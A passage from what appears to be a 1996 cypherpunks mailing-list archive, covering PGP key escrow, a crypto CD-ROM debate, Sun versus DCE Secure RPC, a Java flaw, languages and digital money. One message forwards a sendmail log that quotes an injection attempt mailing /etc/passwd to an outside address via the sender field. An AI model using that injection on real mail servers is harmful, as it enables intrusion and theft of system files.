versions of ViaCrypt PGP 4.0:  A business edition and a personal 
edition.  Essentially, there's a bunch more key management features and 
some new windows features.  In the business edition, you can configure it 
so that keys are essentially "escrowed" in that it will always add "the 
company" to the list of recipients.  Thus, your company can read your 
traffic if they want to.  This was at the request of many businesses who 
stated that they wanted to use PGP, but that they needed some means of 
escrowing the keys.

What's really interesting is what ViaCrypt has planned for even later 
releases: support for DSS (and SHA), DES, triple DES, multiple key rings, 
PC Card token support, provision for large key certificate databases, 
integration with X.509 structures, and a high performance single pass 
mode of operation.  

ViaCrypt put up some marketing stuff on their web page.  Try:
http://www.viacrypt.com/

 > ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
> 
> 

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 28 Mar 1996 16:42:20 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Black Unicorn attempts computer break in
In-Reply-To: <199603270945.KAA13203@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.960327122526.23578A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Anonymous wrote:

> Date:         Wed, 27 Mar 1996 16:58:14 +1100
> Reply-To: Linux Servers mailing list <SERVER-LINUX@NETSPACE.ORG>
> Sender: Linux Servers mailing list <SERVER-LINUX@NETSPACE.ORG>
> From: Steve Gibson <steve@ARIES.INTERSPACE.COM.AU>
> Subject:      Strange things afoot at my SMTP port...
> To: Multiple recipients of list SERVER-LINUX
>               <SERVER-LINUX@NETSPACE.ORG>
> 
> I just found these while going through my messages file... do I
> have any need to be concerned???
> (unicorn.it.wsu.edu is now in my /etc/hosts.deny...)
> 
> Mar 23 20:39:25 aries sendmail[7469]: setsender: "|/bin/mail
> rblack@unicorn.it.wsu.edu < /etc/passwd": invalid or unparseable,
> received from unicorn.it.wsu.edu [1
> Mar 23 20:39:25 aries sendmail[7469]: UAA07469: from="|/bin/mail
> rblack@unicorn.it.wsu.edu < /etc/passwd", size=0, class=0, pri=0,
> nrcpts=0, proto=SMTP, relay=uni
> 
> There were also attempts at connecting to my tftp port, although
> at the time, in.tftpd wasn't on the system (it is now, and is also
> in my hosts.deny to all except for local)
> 
> Thanks...

You should be deeply concerned.

It's clear that I have been having blackouts again.

> 
>                       Interspace Australia Pty Ltd
>                    Steve Gibson - System Administrator
>                        <steve@interspace.com.au>

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 29 Mar 1996 07:55:18 +0800
To: cypherpunks@toad.com
Subject: Re: HP & Export of DCE
Message-ID: <199603272044.MAA13170@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> Adam Shostack writes:
> > Well, if Leahy passes, DCE is exportable.  Anyone know if the
> > 'SecureRPC' in  DCE is the one BAL broke years back?
> 
> No, they broke Sun's Secure RPC, which is different.
> 
> I must admit that I've never done a serious security analysis of DCE
> RPC, though...
> 
> Perry

Where can one find detailed information regarding the (in)security of
Sun's "Secure" RPC?

Specifically, pointers to actual papers by those who have compromised
it (both in theory and practice as relevant) would be appreciated.

Thanks!

Dana W. Albrecht
dwa@corsair.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 11:35:09 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <199603272046.MAA05540@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:13 AM 3/27/96 -0800, Timothy C. May wrote:

>There is not a single foreign language I can think of it that would help me
>in my goals or help anyone I know. This is the reality of a world dominated
>by English-speaking persons and in which all technical people learn
>English.

I would agree with you, except I started International Caving.  When in
Hungery, I heard, "Peter will guide you thru the rest of the cave.  Don't
worry, he speaks good German."  Fortunatly, my German was good enough.

While in China as a normal tourist, a travel agency in Yichang tried to
extort $600 from our group.  My wife's (very poor) knowledge of Manderin
probably scared the preps enough to get them to lay off.

BTW - There are also French speakers on the US border.  They don't want to
speak english either.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 30 Mar 1996 03:42:51 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <v02120d63ad7f5b7c4b69@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 3/27/96, Michael Froomkin wrote:

>I see no reason whatsoever to believe that an un-warranted wiretap would
>be legal in any but two cases.  (1) Emergency threatening life (e.g.
>hostage-taking) pending judicial authorizaiton -- very rare.
>(2) The president claims residual authority to wiretap on national
>security grounds without a court order.  Since the FISA court provides
>the authority, this (one is told) is not used.

On what do you base your belief, give that the law explicitly allows for
"other forms of authorization"? Where does it say that these "other forms
of authorization" are limited to the examples you give?

TIA,



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 28 Mar 1996 19:54:24 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <199603272017.MAA09654@fionn.lbl.gov>
Message-ID: <Pine.SUN.3.92.960327124926.1813A-100000@elaine26.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Michael Helm wrote:

> On Mar 27,  3:13am, Timothy C. May wrote:
> > Americans are typically thousands of miles away from those speaking
> > Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
> [...]
> I don't really disagree with the conclusions drawn by this poster, or
> with the quasi-economics argument he makes.  However, I must say that
> the above is completely wrong.  MOST Americans live in large urban
> areas, & as such are within seconds/footsteps of people whose native
> languages are not English (or who don't have a single "native language",
> but several!).

Undeniably true. I think Tim's point was more, "Who cares?  Everyone *I*
want to talk to speaks English."

One may quibble with the wisdom or morality of such a statement, but if
the second statement is true in your case, then there is no reason you
should have to learn another language. Most upper-income Americans have no
need for esoteric languages. Almost all upper-income Americans have a need
for English.

For example, *I* only really need to speak English, TCP, Spanish, HTML,
AppleTalk, and occasionally French and Perl. Most of the time, I have no
need to know C++, IPX, Tagalog, higher mathematics, German, or Java; I've
got "people" for that.  I'm probably wrong to put my faith in y'all to
write the code I use, but hey, we can't all do everything. I don't write
crypto code, and I don't haul my trash to the dump or tend to the
landscaping around my apartment. Why should I?

Then again, I do find it worthwile to be on the cypherpunks list, and I
will say hola to the gardener.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 04:41:39 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <ad7ed14c1d021004f991@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Thoughtful comments, so I'll comment on Henry's comments:


At 6:10 PM 3/27/96, Henry Huang wrote:

>I'd argue that having a slightly out-of-date CD-ROM is better than nothing,
>because:
>
>- It gives you an idea of what sorts of crypto applications are out there,

True, but your later point about who the intended market is makes the point
I was making: the likeliest users pretty much know what they want and snarf
the most recent (and debugged) version off the Net. (I have little
interest, speaking as a user, in the zillions of variants of CryptDisk and
SmartCrypt and whatnot that get mentioned here....I really only want
"MacPGP" in its latest version, at this time, and for this the Web is
certainly fast enough for me.)

And I suspect I am not that unusual. The faster access to a CD-ROM is not
too useful to most, as the time to install, learn, use, etc. a new crypto
program is many orders of magnitude greater than getting it by even a 14.4
modem.

>- If the authors are smart they'll include URL's to an update site
>  in the documentation (or the CD-ROM producer can do it),

Indeed. Of course, many of these URLs will be dead within a few months of
the CD-ROM being cut, so search engines remain the best way to find the
actual sites and latest version.

>- Not everyone out there is Net-savvy, or has the time to go trudging
>  around looking for the latest cutting-edge versions of software.
>  Time *IS* money.

I agree. But they should learn to use search engines....even AOL and
Compuserve are now offering such access to Alta Vista and such. Not to
sound elitist--just realist--but anyone who wants "AmigaCrypt" and can't
find a way to retrieve it from whatever obscure site that updates it with
bug fixes, is lost.

(And I think we have to be careful to remember the scope of Mr. Holiday's
offer. What are the odds that he will become a nearly full-time archiver of
interesting crypto programs and do the scouring of the Net/Web for
interesting programs? What are the odds that AmigaCrypt will even _be_ on
his CD-ROM?)


>I'd almost argue that Tim's emphasis on using the Web to get crypto
>assumes a sort of Net-centric view of how the crypto is going to be
>used -- similar to reported provisions in the Leahy bill.  The idea
>that people who just want to encrypt personal data might not need the
>latest versions of everything out there is reasonable -- as long as
>the latest versions aren't BUG FIXES.
                     ^^^^^^^^^^^^^^^^

Well, this is really what I had in mind as the main reason for using the
latest version. Bug fixes that fix the actual crypto code may be less
common than bug fixes that let the program work with the latest OS and
such, but in either case it is important to have the bug fix. (Imagine the
frustration of a user trying to run WindowsCryptomatic and finding,
eventually, that the problem that prevented it from running in Windows 3.1
was fixed in WindowsCryptomatic 1.3? And that Mr. Holiday's opus only
contained an early version of WindowsCryptomatic?)

My essential point is that nearly any target user I can think of is going
to zoom down the directory tree to his machine, his OS, his configuration,
and then look for the handful of programs that work...the other 619
megabytes on the CD-ROM don't interest him. And he's going to want a
robust, recent version. For nearly all target users, the Web is the ideal
solution.

(At least compared to a one-off CD-ROM....I haven't seen comments from Mr.
Holiday recently, but I rather doubt he'll commit to an essentially
full-time job of updating the CD-ROM. And of course, will customers buy it?
This I doubt.)


>
>In that case, Tim's argument about stale versions would carry some
>merit.  But this is the case for ALL non-Net distributed software; you
>don't see companies refusing to cut CD-ROMs simply because they're
>worried their users won't be able to get the latest bug fixes.  In the
>ideal case, they'd do the best they can to make sure that people did,
>but you have to be realistic.

Companies cut CD-ROMs for lots of reasons. Often, it is much cheaper than
distributing a dozen or more floppies. And manuals are often distributed
online, in Postscript or Acrobat sorts of formats, thus cutting printing
costs. If the Cypherpunks folks had a similar problem--distributing
hundreds or thousands of floppies and printed manuals--then a CD-ROM would
be a compelling alternative.

Such is not the case, as the software already exists on the Web. So, what's
the compelling reason, especially given the disadvantages cited?

(An interesting question is why commercial vendors don't distribute on the
Web. Well, some do. Netscape, for example. "Click to download." But large,
expensive packages such as FrameMaker or Photoshop have other issues at
hand--security, payment, lots of manuals, etc. I eventually expect more
distribution via the Web. Not a wholly original thought.)


>Plus, comparing the speed of a CD-ROM to a modem is like comparing the
>speed of a station wagon to a skateboard.  CD-ROMs aren't exactly fast,
>but they sure as hell aren't anywhere near as slow as the water-torture
>speeds of your average v.42bis modem.

It depends on how narrow one's focus is. As I recall, it only took me a
couple of minutes to download and automatically unbinhex/unstuff the latest
MacPGP. I submit that _most_ crypto users and potential users have the same
focus: they have little need to download tens of megabytes of programs, so
the speed issue fades out.

...
>I don't buy this.  Many of the well-known/widely-used Net-distributed
>crypto apps haven't put out updates for a LONG time.  Even if it was the
>case that they were throwing out bug fixes every two weeks, my previous
>comments still hold.  (And anyhow, you probably wouldn't WANT to have
>software THAT unstable in your collection anyway.  ;)

I wouldn't. To answer this question we (or Mr. Holiday) need to look at
some numbers:

-- the frequency of "significant" updates for products

-- the frequency of updates of Mr. Holiday's proposed CD-ROM

I could give anecdotal experiences, but why bother. (I'll give one: I
downloaded PGPhone, for the Mac only initially, the day it became available
at the MIT Web site. For various reasons, I couldn't get it to work. This
was last fall. I understand a new version that fixes some problems now
exists, several months later. So, a CD-ROM that had the version of last
fall would not be too interesting.)

My guestimate is that a CD-ROM of crypto programs would have to be updated
TWICE a year, consistently, to be useful. While I know nothing about Mr.
Holiday (itself a reputation issue, not meaning any disrespect to Mr.
Holiday), I do know that most "volunteer" projects follow a characteristic
lifecycle: initial excitement, a "let's put on a show!" attitude, hard work
to get thet first release out, a period of recuperation, and then, often,
abandonment.

(I plead guilty to this on my Cyphernomicon. There is no way in hell I'm
going to devote months of my life to trying to keep it current, especially
when it's so much easier now to just use Alta Vista to search Web pages and
Usenet articles for keywords and concepts.)

>I'm starting to think that the question of whether this CD-ROM is useful
     ^^^^^^^^^^^^^^^^^

This is where I started from!

>depends on who you're selling it to.  People who hang out on Coderpunks,
>or are "in the loop" as to version updates and crypto sites won't want
>this.  People who want to buy the CD just to be "cool" aren't an issue.

Indeed on both of these points.

>The SOHO market (i.e. people who don't normally use the Net, and who
>ordinarily wouldn't care too much about crypto) seems to be the ideal
>target.  But how do you sell a piece of software to an audience that
>doesn't know it needs it?

Indeed. Plus, the whole idea of "selling" this CD-ROM will trigger
resistance. (I'm not saying Mr. Holiday doesn't have a right to try to sell
it--though he may find that he'll have to be _very_ careful and diligent on
getting appropriate releases, else he could find himself in hot water if
even a _single_ author objects to having his program on such a CD-ROM!)


>Perhaps this could be a chance to spread the gospel, so to speak.  However,
>that would mean the CD would have to be designed around these people --
>i.e. for ease of use, etc.  These issues have probably been beaten to
>death a long time ago (e.g. PGP shells), and shouldn't be too difficult
>to resolve.  The multi-platform stuff (DOS/Mac/**IX on one disc) will
>be harder; you'll need to code a different interface to the CD for each
>platform.

Now this project is turning into a Big Project. Good luck!


>
>Hmm, do I hear a volunteer for writing that Crypto Software Web page?  ;)
>


Actually, I've found there is no need for a specific page. There are
hundreds of pages that have links to thousands of other pages.

Maybe I've just gotten "searchcentric," but I rarely go to specific pages
anymore to find information. Instead, I keep Alta Vista always ready to go
and use it to zoom in quickly.

These "metapages" are better than pages!

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Thu, 28 Mar 1996 09:26:23 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto CD UpDate
Message-ID: <199603271810.NAA75303@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 26, 21:18, Timothy C. May wrote:
> At 10:16 PM 3/26/96, aba@atlas.ex.ac.uk wrote:
> >The idea of putting together a CD with crypto stuff is an excellent
> >IDEA, and one which I very much welcome.
> >
> >However a question .. are you (Ben) located in the US?  If so...
> >
> >that rules out overseas buyers unless you fancy messing with ITAR...
> >Is it possible that you could come to some arrangement with some one
> >outside the ITAR fence who has a CD writer (any one reading have one?)
> >put together the same CD for those outside the US?

ITAR is going to be a mess either way.  If the CD is put together outside
the U.S., you'd have to only use non-U.S. executables/source (or else
put site owners at risk of violating the anti-export language in the
ITAR).  Of course, a lot of people don't take this seriously, so pick
your poison ...

> 1. The CD-ROM "freezes" the various programs, archives, etc. at the moment
> the files are finalized and the CD-ROMs are pressed (or burned individually
> on a CD-R, at somewhat higher per-copy price). If the author of the CD-ROM
> is not committed to updating the CD-ROM at frequent intervals--say, every
> few months--then the programs will exhibit "version decay" and be nearly
> useless.
> The next point is the reason.
> 
> 2. The Web does a better job at making the latest versions instantly
> accessible. True, a CD-ROM will generally have faster access, but I care
> more about getting the _latest_ version of PGP, even if takes a minute or
> two to snarf off the Web. That I could get an _older_ version of PGP in
> fractions of a second off this CD-ROM is not compelling to me.

I'd argue that having a slightly out-of-date CD-ROM is better than nothing,
because:

- It gives you an idea of what sorts of crypto applications are out there,

- It gives you working versions of programs without having to crawl
  all over the Net hunting for one,

- If the authors are smart they'll include URL's to an update site
  in the documentation (or the CD-ROM producer can do it),

- Not everyone out there is Net-savvy, or has the time to go trudging
  around looking for the latest cutting-edge versions of software.
  Time *IS* money.

I'd almost argue that Tim's emphasis on using the Web to get crypto
assumes a sort of Net-centric view of how the crypto is going to be
used -- similar to reported provisions in the Leahy bill.  The idea
that people who just want to encrypt personal data might not need the
latest versions of everything out there is reasonable -- as long as
the latest versions aren't BUG FIXES.

In that case, Tim's argument about stale versions would carry some
merit.  But this is the case for ALL non-Net distributed software; you
don't see companies refusing to cut CD-ROMs simply because they're
worried their users won't be able to get the latest bug fixes.  In the
ideal case, they'd do the best they can to make sure that people did,
but you have to be realistic.

(Of course, if you're cynical, and believe that software companies
care more about money than about helping their customers, then it doesn't
matter.  ;)

> (And fractions of a second is too charitable: in actuality, I'd have
> to locate the CD-ROM, dismount anything already mounted, mount the
> CD-ROM, search it for "PGP," etc. Probably not even faster than
> using Alta Vista and downloading.)

Um, whatever.  If you have a CD-ROM, you'll at least have SOME idea of
what software is available on it.  Not so with the Web (unless somebody
wants to do the equivalent of this CD-ROM and put together a page with
a HUGE number of links to crypto programs -- not to mention the protections
necessary to avoid violating ITAR, e.g. the anti-export measures built
into the PGP distribution site)

Plus, comparing the speed of a CD-ROM to a modem is like comparing the
speed of a station wagon to a skateboard.  CD-ROMs aren't exactly fast,
but they sure as hell aren't anywhere near as slow as the water-torture
speeds of your average v.42bis modem.

> 3. Where CD-ROMs really shine over modem alternatives is, of course, for
> very large files. Images, MPEG or Quicktime movies, etc. "Multimedia" being
> the operative term. For crypto, this is not an issue. (Except for list
> archives, where having a few hundred megabytes of articles might be nice.
> However, the absolute KILLER of this idea is the staleness problem mentione
> in Point #1: if the archives on CD-ROM lack the most recent month or two,
> their usefullness drops precipitously. If the CD-ROM is a year old, and no
> updates have appeared, then its archives are useful only to list
> historians.

I don't buy this.  Many of the well-known/widely-used Net-distributed
crypto apps haven't put out updates for a LONG time.  Even if it was the
case that they were throwing out bug fixes every two weeks, my previous
comments still hold.  (And anyhow, you probably wouldn't WANT to have
software THAT unstable in your collection anyway.  ;)

I'm starting to think that the question of whether this CD-ROM is useful
depends on who you're selling it to.  People who hang out on Coderpunks,
or are "in the loop" as to version updates and crypto sites won't want
this.  People who want to buy the CD just to be "cool" aren't an issue.
The SOHO market (i.e. people who don't normally use the Net, and who
ordinarily wouldn't care too much about crypto) seems to be the ideal
target.  But how do you sell a piece of software to an audience that
doesn't know it needs it?

Perhaps this could be a chance to spread the gospel, so to speak.  However,
that would mean the CD would have to be designed around these people --
i.e. for ease of use, etc.  These issues have probably been beaten to
death a long time ago (e.g. PGP shells), and shouldn't be too difficult
to resolve.  The multi-platform stuff (DOS/Mac/**IX on one disc) will
be harder; you'll need to code a different interface to the CD for each
platform.

> (In other words, I will almost always go to up-to-date archives on a Web
> site rather than dusting off a CD-ROM that was issued several months ago.

As would I.  But we're "in the loop".  Many people aren't.  And the real
issue being addressed here (getting easy-to-digest crypto to the masses)
is a lot more difficult than just pressing a CD-ROM.  Ben may need to
rethink his strategy on this, in terms of how to most effectively promote
this CD to that market.

> 4. The Web approach allows powerful search engines, links from other pages,
> and--importantly--multiple jurisdictions. The PGP could come from the U.S.,
> the Digital Postage code from Sweden, and so on. And, again as noted in #
> 1, the developers could keep improving and iterating the code.

Hmm, do I hear a volunteer for writing that Crypto Software Web page?  ;)

-H





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 28 Mar 1996 18:29:35 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: WSJ on Big Java Flaw
Message-ID: <v02140b00ad7f319f86ce@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>John Young wrote:
>>    Wall Street Journal, March 26, 1996, p. B4.
>>    Researchers Find Big Security Flaw In Java Language
>>    By Don Clark
>>
>>    A team of Princeton University researchers said they
>>    discovered the most serious security flaw yet in the widely
>>    used Java programming language from Sun Microsystems Inc.
>>
>>    he said.[..]
>
>The generalized halting problem comes to mind...
>
>Since it can be proved that there's no complete set of heuristics
>to tell if a given program has a characteristic (such as
>"secureness")
>then sooner or later someone will discover another security flaw.
>
>A question is whether a simple patch is made or if the set of
>heuristics
>is widened (ie, learn from mistakes) so that similar flaws can
>be found
>based on knowledge of that one flaw.

Well, actually, the halting problem doesn't really apply here.
Imagine you've got a two tape Turing machine. Then go into the
control function and block out all calls that either write or
read tape 2. I contend it is trivial to prove that no program
that runs on tape 1 will ever read or write tape 2.

It is quite possible to prove that certain mathematical feats
can't be done. You can use algebra to prove that there is no way
to trisect an angle with just a compass and a straight-edge.
Godel's theorem and its corollary work on Turing machines, only
shows that you can't come up with a general mathematical
procedure for proving or disproving all statements all of the
time.

I think it is quite possible for Sun to build a secure version
of Java. It might take many iterations and they might make some
subtle mistakes, but time should allow them to plug these holes.
They're simply trying to make sure that all of their various
doo-dads and extras don't write tape 2. Their abstract model is
much more complex than a Turing machine, but it is much simpler
than C code or the UNIX OS.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 29 Mar 1996 17:12:23 +0800
To: tcmay@got.net
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad7e4b691902100484d7@[205.199.118.202]>
Message-ID: <bUbWx8m9LEgB085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <ad7e4b691902100484d7@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> Americans are typically thousands of miles away from those speaking
> Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
> Talegu, and the hundreds of other languages. It is not at all clear what
> language Americans should pick as a "second language" to study.

What continent do you live on?  As I write this my next-door neighbor's 
stereo is blaring out music in Yoruba.  When I took my mother to the 
hospital in San Francisco last month, all the signs were bilingual in
English and Russian.  And many, many Californians whose first language
is Spanish are from families that have lived here for generations.

Ya ne znayu o *vas*, no ya panimayu po russki khorosho, et je comprend
Francais suffisamment, aussi. I wish I had had the sense to study a
*useful* language like Spanish in school; one of these years I'm going
to make up that deficiency.


-- 
Alan Bostick               | I'm laughing with, not laughing at.
mailto:abostick@netcom.com | The question is, laughing with WHAT?
news:alt.grelb             |      James "Kibo" Parry <kibo@world.std.com>
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 28 Mar 1996 13:58:54 +0800
To: cypherpunks@toad.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <9603272138.AA03891@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
> | > Well, if Leahy passes, DCE is exportable.  Anyone know if the
> | > 'SecureRPC' in  DCE is the one BAL broke years back?
> | 
> | No, they broke Sun's Secure RPC, which is different.
>
> I wasn't aware there were multiple things masquerading under the name
> Secure RPC.

Yes, there are.  The term "RPC" is sometimes used generically, to refer
to any remote procedure calling mechanism, but also refers to at least
two distinct implementations.


The first "RPC" was produced by Sun's Open Network Computing group.  This
is still the most commonly used, as Sun made the source code available
at no cost [1].  Many vendors (including HP) now provide it as a
standard part of their UNIX distribution [2].  A transport-independent
version, TI-RPC, was later produced, but this doesn't appear to be quite
as widely used, though I think it is in Solaris.  (Sorry, I don't know
of an archive site for this; try Alta Vista et al.)

Sun's version of "Secure RPC" includes Unix (uid-based) and (in North
America) DES authentication.  The basic mechanism can support other
authentication schemes as well, though I've never actually heard of any
alternative implementations.  This is the "Secure RPC" whose key exchange
was cryptanalyzed by LaMacchia and Odlyzko [3].


Another "RPC" comes from the Open Software Foundation, who unfortunately
chose the same acronym for the remote procedure calling mechanism in their
Distributed Computing Environment (DCE).  This DCE is a part of the OSF/1
operating system, but implementations are available for many versions of
UNIX, often as a separate product or option.  The DCE Security Services
are discussed a bit in the DCE FAQ [4], and O'Reilly has an entire book
on the subject [5].


To confuse matters further, it now seems that Microsoft has added an "RPC"
mechanism to Windows NT and 95.  This is sort of compatible with OSF DCE
RPC, but not entirely; see [4].


In short, it would help to avoid massive confusion if people were more
specific: refer to "DCE RPC", "ONC RPC" (or "Sun RPC", if you must :),
or "Microsoft RPC", not just to "RPC".

- --
Martin Janzen           janzen@idacom.hp.com
Pegasus Systems Group   c/o Hewlett-Packard, IDACOM Telecom Operation



[1] Try ftp://bcm.tmc.edu/nfs or ftp://wuarchive.wustl.edu/systems/sun/
sun-exchange/rpc4.0, or a comp.sources.unix archive site.

[2] To see if you have it, type "man rpc", or search your C library
using something like "nm /lib/libc.a | grep clnt".  If it's installed,
you should see functions like "clnttcp_create", "clntudp_create", etc.
If not, look for a separate librpc.a in /lib, /usr/lib, /usr/local/lib,
or what have you -- or ftp it from the archive sites and build your own.

[3] Here's the reference, courtesy of Matt Blaze:

@article{nfscrack,
   author = {Brian A. LaMacchia and Andrew M. Odlyzko},
   journal = {Designs, Codes, and Cryptography},
   pages = {46--62},
   title = {Computation of Discrete Logarithms in Prime Fields},
   volume = {1},
   year = {1991},
}

Brian also has a home page, http://www.swiss.ai.mit.edu/~bal/bal-home.html
but as my Net connection is flaky right now, I can't tell whether this
article is available there.

[4] The DCE FAQ is at http://www.osf.org/dce/faq-mauney.html or
ftp://ftp.dstc.edu.au/pub/DCE/FAQ.

[5] "DCE Security", Wei Hu, O'Reilly, ISBN 1-56592-134-8.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVm1GG3Fsi8cupgZAQHKkwP/QQaKNEuwuvNo5E+8Myu2P/Dv70Ha4p88
RhtEH11oBH4IjMksqL0J+o8qSOwiBA/bcciW6y8ef1gSgwFxmdbEqGmLftSGjYNU
D6r8C5LmSkmmtQuLcXUE+QVEBLIXmnYC0tIwbqprGGm0soQpW0GbzZtgXtrECm0H
Vi1bsJ+LEJQ=
=3e3P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 22:18:33 +0800
To: cypherpunks@toad.com
Subject: What backs up digital money?
Message-ID: <ad7ede961f02100418d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I apologize for changing the thread name, but the existing name, "Re:
(X:x)e$ 's other use," seems unrelated to these points.


At 1:46 PM 3/27/96, Scott Schryvers wrote:

>Question.
>If e-cash were backed by gold would that make it more reliable than say the
>dollar?


This question, and much of the debate that appears here about digital money
in its many and confusing forms (e-cash, digicash, bitmarks, e$,
cypherfrancs, chaums, etc.), displays a "type error" in thinking about
digital money.

No form of digital money extant is an actual currency in the conventional
sense. Nor does this seem likely. Nor necessary. Nor useful. Nor important.

Rather, think in terms of _checks_ or _wire transfers_ and the like. An
order to transfer funds from one account or place of holding to another.

Eric Hughes was our local resident self-educated expert on commercial
paper, notes, bank drafts, etc. Bob Hettinga has also written extensively
on this. A nice little book I use is "The MIT Dictionary of Modern
Economics," 4th, edited by David W. Pearce, 1992. Nothing yet on digital
money and how various forms of it fit into the taxonomy of financial
instruments. I expect by the 6th edition, in a few years, we'll see some
stuff.

But here are just a couple of definitions, to tell you all that an actual
taxonomy does exist, that "money" is not the all-inclusive type.


* "currency. Strictly, that component of a country's money stock that
literally circulates from hand to hand, i.e., coin and banknotes...."

* "cheque. A document, normally supplied in printed form by a bank,
ordering the bank to transfer funds from the drawer's current account to a
named payee...."

(more wrinkles about negotiability, endorsements, counter checks, etc.)

So, what are the classifications of the schemes offered by CyberCash, First
Virtual, Digicash, Mark Twain Bank, and so on? A useful project for any of
you out there with banking or finance interests.

Most of these are currently variants of credit card transactions, and the
best of these (in cryptographic terms) appears to be a variant of a
straight bank. I might give instructions for Union Bank to transfer X
amount of gold, or Swiss francs, or dollars from Account X to Account Y,
where Account Y might be in the same bank, might be in another bank, or
might be to anyone who showed up at the bank and produced the claim...

The point being that talking about "what backs up digital cash?" is
misleading. (What really backs it up is the reputation of the entities, but
I digress.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 07:57:42 +0800
To: Phil Karlton <karlton@netscape.com>
Subject: Re: Edited Edupage, 24 March 1996
